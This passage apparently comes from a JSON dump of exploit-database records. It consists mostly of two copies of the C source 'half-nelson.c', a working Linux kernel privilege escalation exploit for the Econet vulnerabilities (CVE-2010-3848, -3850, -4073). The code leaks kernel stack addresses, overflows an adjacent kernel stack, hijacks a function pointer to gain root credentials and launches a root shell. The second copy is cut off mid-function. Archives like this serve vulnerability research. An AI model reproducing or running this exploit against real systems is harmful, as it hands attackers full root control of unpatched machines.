NULL);\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70365", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:59:12", "description": "No description provided by source.", "cvss3": {}, "published": "2011-09-09T00:00:00", "title": "Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3848", "CVE-2010-3850", "CVE-2010-4073"], "modified": "2011-09-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20924", "id": "SSV:20924", "sourceData": "\n /*\r\n * half-nelson.c\r\n *\r\n * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n *\r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848\r\n *\r\n * Stack-based buffer overflow in the econet_sendmsg function in\r\n * net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an\r\n * econet address is configured, allows local users to gain privileges by\r\n * providing a large number of iovec structures.\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850\r\n *\r\n * The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel\r\n * before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which\r\n * allows local users to bypass intended access restrictions and configure\r\n * econet addresses via an SIOCSIFADDR ioctl call.\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073\r\n *\r\n * The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not\r\n * initialize certain structures, which allows local users to obtain\r\n * potentially sensitive information from kernel stack memory.\r\n *\r\n * Usage:\r\n *\r\n * $ gcc half-nelson.c -o half-nelson -lrt\r\n * $ ./half-nelson\r\n * [+] looking for symbols...\r\n * [+] resolved symbol commit_creds to 0xffffffff81088ad0\r\n * [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0\r\n * [+] resolved symbol ia32_sysret to 0xffffffff81046692\r\n * [+] spawning children to achieve adjacent kstacks...\r\n * [+] found parent kstack at 0xffff88001c6ca000\r\n * [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000\r\n * [+] lower child spawning a helper...\r\n * [+] lower child calling compat_sys_wait4 on helper...\r\n * [+] helper going to sleep...\r\n * [+] upper child triggering stack overflow...\r\n * [+] helper woke up\r\n * [+] lower child returned from compat_sys_wait4\r\n * [+] parent's restart_block has been clobbered\r\n * [+] escalating privileges...\r\n * [+] launching root shell!\r\n * # id\r\n * uid=0(root) gid=0(root)\r\n *\r\n * Notes:\r\n *\r\n * This exploit leverages three vulnerabilities to escalate privileges.\r\n * The primary vulnerability is a kernel stack overflow, not a stack buffer\r\n * overflow as the CVE description incorrectly states. I believe this is the\r\n * first public exploit for a kernel stack overflow, and it turns out to be\r\n * a bit tricky due to some particulars of the econet vulnerability. A full\r\n * breakdown of the exploit is forthcoming.\r\n *\r\n * Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <stddef.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <syscall.h>\r\n#include <inttypes.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/wait.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/mman.h>\r\n#include <sys/ipc.h>\r\n#include <sys/sem.h>\r\n#include <sys/stat.h>\r\n#include <sys/mman.h>\r\n#include <sys/resource.h>\r\n#include <sys/syscall.h>\r\n#include <netinet/in.h>\r\n#include <net/if.h>\r\n \r\n#define IOVS 446\r\n#define NPROC 1024\r\n#define KSTACK_SIZE 8192\r\n \r\n#define KSTACK_UNINIT 0\r\n#define KSTACK_UPPER 1\r\n#define KSTACK_LOWER 2\r\n#define KSTACK_DIE 3\r\n#define KSTACK_PARENT 4\r\n#define KSTACK_CLOBBER 5\r\n \r\n#define LEAK_BASE 0xffff880000000000\r\n#define LEAK_TOP 0xffff8800c0000000\r\n#define LEAK_DEPTH 500\r\n#define LEAK_OFFSET 32\r\n \r\n#define NR_IPC 0x75\r\n#define NR_WAIT4 0x72\r\n#define SEMCTL 0x3\r\n \r\n#ifndef PF_ECONET\r\n#define PF_ECONET 19\r\n#endif\r\n \r\n#define STACK_OFFSET 6\r\n#define RESTART_OFFSET 40\r\n \r\nstruct ec_addr {\r\n unsigned char station;\r\n unsigned char net;\r\n};\r\n \r\nstruct sockaddr_ec {\r\n unsigned short sec_family;\r\n unsigned char port;\r\n unsigned char cb;\r\n unsigned char type;\r\n struct ec_addr addr;\r\n unsigned long cookie;\r\n};\r\n \r\nstruct ipc64_perm {\r\n uint32_t key;\r\n uint32_t uid;\r\n uint32_t gid;\r\n uint32_t cuid;\r\n uint32_t cgid;\r\n uint32_t mode;\r\n uint16_t seq;\r\n uint16_t __pad2;\r\n unsigned long __unused1;\r\n unsigned long __unused2;\r\n};\r\n \r\nstruct semid64_ds {\r\n struct ipc64_perm sem_perm;\r\n unsigned long sem_otime;\r\n unsigned long __unused1;\r\n unsigned long sem_ctime;\r\n unsigned long __unused;\r\n unsigned long sem_nsems;\r\n unsigned long __unused3;\r\n unsigned long __unused4;\r\n};\r\n \r\nunion semun {\r\n int val;\r\n struct semid_ds *buf;\r\n unsigned short *array;\r\n struct seminfo *__buf;\r\n};\r\n \r\nstruct region {\r\n unsigned long parent;\r\n unsigned long addrs[NPROC];\r\n};\r\nstruct region *region;\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long ia32_sysret;\r\n \r\nvoid __attribute__((regparm(3)))\r\nkernel_code(void)\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\nvoid\r\npayload_parent(void)\r\n{\r\n asm volatile (\r\n "mov $kernel_code, %rax\\n"\r\n "call *%rax\\n"\r\n );\r\n}\r\n \r\nvoid\r\npayload_child(void)\r\n{\r\n asm volatile (\r\n "movq $payload_parent, (%0)\\n"\r\n "jmpq *%1\\n"\r\n :\r\n : "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret)\r\n );\r\n}\r\n \r\nunsigned long\r\nget_kstack(void)\r\n{\r\n int i, size, offset;\r\n union semun *arg;\r\n struct semid_ds dummy;\r\n struct semid64_ds *leaked;\r\n char *stack_start, *stack_end;\r\n unsigned char *p;\r\n unsigned long kstack, *ptr;\r\n \r\n /* make sure our argument is 32-bit accessible */\r\n arg = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\r\n if (arg == MAP_FAILED) {\r\n printf("[-] failure mapping memory, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n /* map a fake stack to use during syscall */\r\n stack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\r\n if (stack_start == MAP_FAILED) {\r\n printf("[-] failure mapping memory, aborting!\\n");\r\n exit(1);\r\n }\r\n stack_end = stack_start + 4096;\r\n \r\n memset(arg, 0, sizeof(union semun));\r\n memset(&dummy, 0, sizeof(struct semid_ds));\r\n arg->buf = &dummy;\r\n \r\n /* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */\r\n asm volatile (\r\n "push %%rax\\n"\r\n "push %%rbx\\n"\r\n "push %%rcx\\n"\r\n "push %%rdx\\n"\r\n "push %%rsi\\n"\r\n "push %%rdi\\n"\r\n "movl %0, %%eax\\n"\r\n "movl %1, %%ebx\\n"\r\n "movl %2, %%ecx\\n"\r\n "movl %3, %%edx\\n"\r\n "movl %4, %%esi\\n"\r\n "movq %5, %%rdi\\n"\r\n "movq %%rsp, %%r8\\n"\r\n "movq %6, %%rsp\\n"\r\n "push %%r8\\n"\r\n "int $0x80\\n"\r\n "pop %%r8\\n"\r\n "movq %%r8, %%rsp\\n"\r\n "pop %%rdi\\n"\r\n "pop %%rsi\\n"\r\n "pop %%rdx\\n"\r\n "pop %%rcx\\n"\r\n "pop %%rbx\\n"\r\n "pop %%rax\\n"\r\n :\r\n : "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)\r\n : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"\r\n );\r\n \r\n /* naively extract a pointer to the kstack from the kstack */\r\n p = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;\r\n kstack = *(unsigned long *) p;\r\n \r\n if (kstack < LEAK_BASE || kstack > LEAK_TOP) {\r\n printf("[-] failed to leak a suitable kstack address, try again!\\n");\r\n exit(1);\r\n }\r\n if ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {\r\n printf("[-] failed to leak a suitable kstack address, try again!\\n");\r\n exit(1);\r\n }\r\n \r\n kstack = kstack & ~0x1fff;\r\n \r\n return kstack;\r\n}\r\n \r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy, sym[512];\r\n int ret = 0;\r\n \r\n f = fopen("/proc/kallsyms", "r");\r\n if (!f) {\r\n return 0;\r\n }\r\n \r\n while (ret != EOF) {\r\n ret = fscanf(f, "%p %c %s\\n", (void **) &addr, &dummy, sym);\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sym);\r\n continue;\r\n }\r\n if (!strcmp(name, sym)) {\r\n printf("[+] resolved symbol %s to %p\\n", name, (void *) addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n \r\n return 0;\r\n}\r\n \r\nint\r\nget_adjacent_kstacks(void)\r\n{\r\n int i, ret, shm, pid, type;\r\n \r\n /* create shared communication channel between parent and its children */\r\n shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);\r\n if (shm < 0) {\r\n printf("[-] failed creating shared memory, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n ret = ftruncate(shm, sizeof(struct region));\r\n if (ret != 0) {\r\n printf("[-] failed resizing shared memory, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n region = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);\r\n memset(region, KSTACK_UNINIT, sizeof(struct region));\r\n \r\n /* parent kstack self-discovery */\r\n region->parent = get_kstack();\r\n \r\n printf("[+] found parent kstack at 0x%lx\\n", region->parent);\r\n \r\n /* fork and discover children with adjacently-allocated kernel stacks */\r\n for (i = 0; i < NPROC; ++i) {\r\n pid = fork();\r\n \r\n if (pid > 0) {\r\n type = KSTACK_PARENT;\r\n continue;\r\n } else if (pid == 0) {\r\n /* children do kstack self-discovery */\r\n region->addrs[i] = get_kstack();\r\n \r\n /* children sleep until parent has found adjacent children */\r\n while (1) {\r\n sleep(1);\r\n if (region->addrs[i] == KSTACK_DIE) {\r\n /* parent doesn't need us :-( */\r\n exit(0);\r\n } else if (region->addrs[i] == KSTACK_UPPER) {\r\n /* we're the upper adjacent process */\r\n type = KSTACK_UPPER;\r\n break;\r\n } else if (region->addrs[i] == KSTACK_LOWER) {\r\n /* we're the lower adjacent process */\r\n type = KSTACK_LOWER;\r\n break;\r\n }\r\n }\r\n break;\r\n } else {\r\n printf("[-] fork failed, aborting!\\n");\r\n exit(1);\r\n }\r\n }\r\n \r\n return type;\r\n}\r\n \r\nvoid\r\ndo_parent(void)\r\n{\r\n int i, j, upper, lower;\r\n \r\n /* parent sleeps until we've discovered all the child kstacks */\r\n while (1) {\r\n sleep(1);\r\n for (i = 0; i < NPROC; ++i) {\r\n if (region->addrs[i] == KSTACK_UNINIT) {\r\n break;\r\n }\r\n }\r\n if (i == NPROC) {\r\n break;\r\n }\r\n }\r\n \r\n /* figure out if we have any adjacent child kstacks */\r\n for (i = 0; i < NPROC; ++i) {\r\n for (j = 0; j < NPROC; ++j) {\r\n if (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {\r\n break;\r\n }\r\n }\r\n if (j != NPROC) {\r\n break;\r\n }\r\n }\r\n if (i == NPROC && j == NPROC) {\r\n printf("[-] failed to find adjacent kstacks, try again!\\n");\r\n exit(1);\r\n }\r\n \r\n upper = i;\r\n lower = j;\r\n \r\n printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\\n", region->addrs[lower], region->addrs[upper]);\r\n \r\n /* signal to non-adjacent children to die */\r\n for (i = 0; i < NPROC; ++i) {\r\n if (i != upper && i != lower) {\r\n region->addrs[i] = KSTACK_DIE;\r\n }\r\n }\r\n \r\n /* signal adjacent children to continue on */\r\n region->addrs[upper] = KSTACK_UPPER;\r\n region->addrs[lower] = KSTACK_LOWER;\r\n \r\n /* parent sleeps until child has clobbered the fptr */\r\n while (1) {\r\n sleep(1);\r\n if (region->parent == KSTACK_CLOBBER) {\r\n break;\r\n }\r\n }\r\n \r\n printf("[+] escalating privileges...\\n");\r\n \r\n /* trigger our clobbered fptr */\r\n syscall(__NR_restart_syscall);\r\n \r\n /* our privileges should be escalated now */\r\n if (getuid() != 0) {\r\n printf("[-] privilege escalation failed, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] launching root shell!\\n");\r\n \r\n execl("/bin/sh", "/bin/sh", NULL);\r\n}\r\n \r\nvoid\r\ndo_child_upper(void)\r\n{\r\n int i, ret, eco_sock;\r\n struct sockaddr_ec eco_addr;\r\n struct msghdr eco_msg;\r\n struct iovec iovs[IOVS];\r\n struct ifreq ifr;\r\n char *target;\r\n \r\n /* calculate payload target, skip prologue */\r\n target = (char *) payload_child;\r\n target += 4;\r\n \r\n /* give lower child a chance to enter its wait4 call */\r\n sleep(1);\r\n \r\n /* write some zeros */\r\n for (i = 0; i < STACK_OFFSET; ++i) {\r\n iovs[i].iov_base = (void *) 0x0;\r\n iovs[i].iov_len = 0;\r\n }\r\n \r\n /* overwrite saved ia32_sysret address on stack */\r\n iovs[STACK_OFFSET].iov_base = (void *) target;\r\n iovs[STACK_OFFSET].iov_len = 0x0246;\r\n \r\n /* force abort via EFAULT */\r\n for (i = STACK_OFFSET + 1; i < IOVS; ++i) {\r\n iovs[i].iov_base = (void *) 0xffffffff00000000;\r\n iovs[i].iov_len = 0;\r\n }\r\n \r\n /* create econet socket */\r\n eco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);\r\n if (eco_sock < 0) {\r\n printf("[-] failed creating econet socket, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n memset(&ifr, 0, sizeof(ifr));\r\n strcpy(ifr.ifr_name, "lo");\r\n \r\n /* trick econet into associated with the loopback */\r\n ret = ioctl(eco_sock, SIOCSIFADDR, &ifr);\r\n if (ret != 0) {\r\n printf("[-] failed setting interface address, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n memset(&eco_addr, 0, sizeof(eco_addr));\r\n memset(&eco_msg, 0, sizeof(eco_msg));\r\n eco_msg.msg_name = &eco_addr;\r\n eco_msg.msg_namelen = sizeof(eco_addr);\r\n eco_msg.msg_flags = 0;\r\n eco_msg.msg_iov = &iovs[0];\r\n eco_msg.msg_iovlen = IOVS;\r\n \r\n printf("[+] upper child triggering stack overflow...\\n");\r\n \r\n /* trigger the kstack overflow into lower child's kstack */\r\n ret = sendmsg(eco_sock, &eco_msg, 0);\r\n if (ret != -1 || errno != EFAULT) {\r\n printf("[-] sendmsg succeeded unexpectedly, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n close(eco_sock);\r\n}\r\n \r\nvoid\r\ndo_child_lower(void)\r\n{\r\n int pid;\r\n \r\n printf("[+] lower child spawning a helper...\\n");\r\n \r\n /* fork off a helper to wait4 on */\r\n pid = fork();\r\n if (pid == 0) {\r\n printf("[+] helper going to sleep...\\n");\r\n sleep(5);\r\n printf("[+] helper woke up\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] lower child calling compat_sys_wait4 on helper...\\n");\r\n \r\n /* syscall(NR_WAIT4, pid, 0, 0, 0) */\r\n asm volatile (\r\n "push %%rax\\n"\r\n "push %%rbx\\n"\r\n "push %%rcx\\n"\r\n "push %%rdx\\n"\r\n "push %%rsi\\n"\r\n "movl %0, %%eax\\n"\r\n "movl %1, %%ebx\\n"\r\n "movl %2, %%ecx\\n"\r\n "movl %3, %%edx\\n"\r\n "movl %4, %%esi\\n"\r\n "int $0x80\\n"\r\n "pop %%rsi\\n"\r\n "pop %%rdx\\n"\r\n "pop %%rcx\\n"\r\n "pop %%rbx\\n"\r\n "pop %%rax\\n"\r\n :\r\n : "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)\r\n : "memory", "rax", "rbx", "rcx", "rdx", "rsi"\r\n );\r\n \r\n printf("[+] lower child returned from compat_sys_wait4\\n");\r\n \r\n printf("[+] parent's restart_block has been clobbered\\n");\r\n \r\n /* signal parent that our fptr should now be clobbered */\r\n region->parent = KSTACK_CLOBBER;\r\n}\r\n \r\nint\r\nmain(int argc, char **argv)\r\n{\r\n int type;\r\n \r\n if (sizeof(unsigned long) != 8) {\r\n printf("[-] x86_64 only, sorry!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] looking for symbols...\\n");\r\n \r\n commit_creds = (_commit_creds) get_symbol("commit_creds");\r\n if (!commit_creds) {\r\n printf("[-] symbol table not available, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");\r\n if (!prepare_kernel_cred) {\r\n printf("[-] symbol table not available, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n ia32_sysret = get_symbol("ia32_sysret");\r\n if (!ia32_sysret) {\r\n printf("[-] symbol table not available, aborting!\\n");\r\n exit(1);\r\n }\r\n \r\n printf("[+] spawning children to achieve adjacent kstacks...\\n");\r\n \r\n type = get_adjacent_kstacks();\r\n \r\n if (type == KSTACK_PARENT) {\r\n do_parent();\r\n } else if (type == KSTACK_UPPER) {\r\n do_child_upper();\r\n } else if (type == KSTACK_LOWER) {\r\n do_child_lower();\r\n }\r\n \r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20924", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:28:36", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3848", "CVE-2010-3850", "CVE-2010-4073"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72066", "id": "SSV:72066", "sourceData": "\n /*\r\n * half-nelson.c\r\n *\r\n * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848\r\n *\r\n * Stack-based buffer overflow in the econet_sendmsg function in \r\n * net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an \r\n * econet address is configured, allows local users to gain privileges by \r\n * providing a large number of iovec structures.\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850\r\n *\r\n * The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel \r\n * before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which \r\n * allows local users to bypass intended access restrictions and configure \r\n * econet addresses via an SIOCSIFADDR ioctl call.\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073\r\n *\r\n * The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not \r\n * initialize certain structures, which allows local users to obtain \r\n * potentially sensitive information from kernel stack memory.\r\n *\r\n * Usage:\r\n *\r\n * $ gcc half-nelson.c -o half-nelson -lrt\r\n * $ ./half-nelson\r\n * [+] looking for symbols...\r\n * [+] resolved symbol commit_creds to 0xffffffff81088ad0\r\n * [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0\r\n * [+] resolved symbol ia32_sysret to 0xffffffff81046692\r\n * [+] spawning children to achieve adjacent kstacks...\r\n * [+] found parent kstack at 0xffff88001c6ca000\r\n * [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000\r\n * [+] lower child spawning a helper...\r\n * [+] lower child calling compat_sys_wait4 on helper...\r\n * [+] helper going to sleep...\r\n * [+] upper child triggering stack overflow...\r\n * [+] helper woke up\r\n * [+] lower child returned from compat_sys_wait4\r\n * [+] parent's restart_block has been clobbered\r\n * [+] escalating privileges...\r\n * [+] launching root shell!\r\n * # id\r\n * uid=0(root) gid=0(root)\r\n *\r\n * Notes:\r\n *\r\n * This exploit leverages three vulnerabilities to escalate privileges. \r\n * The primary vulnerability is a kernel stack overflow, not a stack buffer \r\n * overflow as the CVE description incorrectly states. I believe this is the\r\n * first public exploit for a kernel stack overflow, and it turns out to be \r\n * a bit tricky due to some particulars of the econet vulnerability. A full \r\n * breakdown of the exploit is forthcoming.\r\n *\r\n * Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <stddef.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <limits.h>\r\n#include <syscall.h>\r\n#include <inttypes.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/wait.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/mman.h>\r\n#include <sys/ipc.h>\r\n#include <sys/sem.h>\r\n#include <sys/stat.h>\r\n#include <sys/mman.h>\r\n#include <sys/resource.h>\r\n#include <sys/syscall.h>\r\n#include <netinet/in.h>\r\n#include <net/if.h>\r\n\r\n#define IOVS 446\r\n#define NPROC 1024\r\n#define KSTACK_SIZE 8192\r\n\r\n#define KSTACK_UNINIT 0\r\n#define KSTACK_UPPER 1\r\n#define KSTACK_LOWER 2\r\n#define KSTACK_DIE 3\r\n#define KSTACK_PARENT 4\r\n#define KSTACK_CLOBBER 5\r\n\r\n#define LEAK_BASE 0xffff880000000000\r\n#define LEAK_TOP 0xffff8800c0000000\r\n#define LEAK_DEPTH 500\r\n#define LEAK_OFFSET 32 \r\n\r\n#define NR_IPC 0x75\r\n#define NR_WAIT4 0x72\r\n#define SEMCTL 0x3\r\n\r\n#ifndef PF_ECONET\r\n#define PF_ECONET 19\r\n#endif\r\n\r\n#define STACK_OFFSET 6\r\n#define RESTART_OFFSET 40\r\n\r\nstruct ec_addr {\r\n\tunsigned char station;\r\n\tunsigned char net;\r\n};\r\n\r\nstruct sockaddr_ec {\r\n\tunsigned short sec_family;\r\n\tunsigned char port;\r\n\tunsigned char cb;\r\n\tunsigned char type;\r\n\tstruct ec_addr addr;\r\n\tunsigned long cookie;\r\n};\r\n\r\nstruct ipc64_perm {\r\n\tuint32_t key;\r\n\tuint32_t uid;\r\n\tuint32_t gid;\r\n\tuint32_t cuid;\r\n\tuint32_t cgid;\r\n\tuint32_t mode;\r\n\tuint16_t seq;\r\n\tuint16_t __pad2;\r\n\tunsigned long __unused1;\r\n\tunsigned long __unused2;\r\n};\r\n\r\nstruct semid64_ds {\r\n\tstruct ipc64_perm sem_perm;\r\n\tunsigned long sem_otime;\r\n\tunsigned long __unused1;\r\n\tunsigned long sem_ctime;\r\n\tunsigned long __unused;\r\n\tunsigned long sem_nsems;\r\n\tunsigned long __unused3;\r\n\tunsigned long __unused4;\r\n};\r\n\r\nunion semun {\r\n\tint val;\r\n\tstruct semid_ds *buf;\r\n\tunsigned short *array;\r\n\tstruct seminfo *__buf;\r\n};\r\n\r\nstruct region {\r\n\tunsigned long parent;\r\n\tunsigned long addrs[NPROC];\r\n};\r\nstruct region *region;\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long ia32_sysret;\r\n \r\nvoid __attribute__((regparm(3)))\r\nkernel_code(void)\r\n{\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n}\r\n\r\nvoid\r\npayload_parent(void)\r\n{\r\n\tasm volatile (\r\n\t\t"mov $kernel_code, %rax\\n"\r\n\t\t"call *%rax\\n"\r\n\t);\r\n}\r\n\r\nvoid\r\npayload_child(void)\r\n{\r\n\tasm volatile (\r\n\t\t"movq $payload_parent, (%0)\\n"\r\n\t\t"jmpq *%1\\n"\r\n\t\t:\r\n\t\t: "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret)\r\n\t);\r\n}\r\n\r\nunsigned long\r\nget_kstack(void)\r\n{\r\n\tint i, size, offset;\r\n\tunion semun *arg;\r\n\tstruct semid_ds dummy;\r\n\tstruct semid64_ds *leaked;\r\n\tchar *stack_start, *stack_end;\r\n\tunsigned char *p;\r\n\tunsigned long kstack, *ptr;\r\n\r\n\t/* make sure our argument is 32-bit accessible */\r\n\targ = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\r\n\tif (arg == MAP_FAILED) {\r\n\t\tprintf("[-] failure mapping memory, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\t/* map a fake stack to use during syscall */\r\n\tstack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);\r\n\tif (stack_start == MAP_FAILED) {\r\n\t\tprintf("[-] failure mapping memory, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\tstack_end = stack_start + 4096;\r\n\r\n\tmemset(arg, 0, sizeof(union semun));\r\n\tmemset(&dummy, 0, sizeof(struct semid_ds));\r\n\targ->buf = &dummy;\r\n\r\n\t/* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */\r\n\tasm volatile (\r\n\t\t"push %%rax\\n"\r\n\t\t"push %%rbx\\n"\r\n\t\t"push %%rcx\\n"\r\n\t\t"push %%rdx\\n"\r\n\t\t"push %%rsi\\n"\r\n\t\t"push %%rdi\\n"\r\n\t\t"movl %0, %%eax\\n"\r\n\t\t"movl %1, %%ebx\\n"\r\n\t\t"movl %2, %%ecx\\n"\r\n\t\t"movl %3, %%edx\\n"\r\n\t\t"movl %4, %%esi\\n"\r\n\t\t"movq %5, %%rdi\\n"\r\n\t\t"movq %%rsp, %%r8\\n"\r\n\t\t"movq %6, %%rsp\\n"\r\n\t\t"push %%r8\\n"\r\n\t\t"int $0x80\\n"\r\n\t\t"pop %%r8\\n"\r\n\t\t"movq %%r8, %%rsp\\n"\r\n\t\t"pop %%rdi\\n"\r\n\t\t"pop %%rsi\\n"\r\n\t\t"pop %%rdx\\n"\r\n\t\t"pop %%rcx\\n"\r\n\t\t"pop %%rbx\\n"\r\n\t\t"pop %%rax\\n"\r\n\t\t:\r\n\t\t: "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)\r\n\t\t: "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"\r\n\t);\r\n\r\n\t/* naively extract a pointer to the kstack from the kstack */\r\n\tp = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;\r\n\tkstack = *(unsigned long *) p;\r\n\r\n\tif (kstack < LEAK_BASE || kstack > LEAK_TOP) {\r\n\t\tprintf("[-] failed to leak a suitable kstack address, try again!\\n");\r\n\t\texit(1);\r\n\t}\r\n\tif ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {\r\n\t\tprintf("[-] failed to leak a suitable kstack address, try again!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tkstack = kstack & ~0x1fff;\r\n\t\r\n\treturn kstack;\r\n}\r\n\r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy, sym[512];\r\n\tint ret = 0;\r\n \r\n\tf = fopen("/proc/kallsyms", "r");\r\n\tif (!f) {\r\n\t\treturn 0;\r\n\t}\r\n \r\n\twhile (ret != EOF) {\r\n\t\tret = fscanf(f, "%p %c %s\\n", (void **) &addr, &dummy, sym);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, "%s\\n", sym);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sym)) {\r\n\t\t\tprintf("[+] resolved symbol %s to %p\\n", name, (void *) addr);\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\tfclose(f);\r\n \r\n\treturn 0;\r\n}\r\n\r\nint\r\nget_adjacent_kstacks(void)\r\n{\r\n\tint i, ret, shm, pid, type;\r\n\r\n\t/* create shared communication channel between parent and its children */\r\n\tshm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | 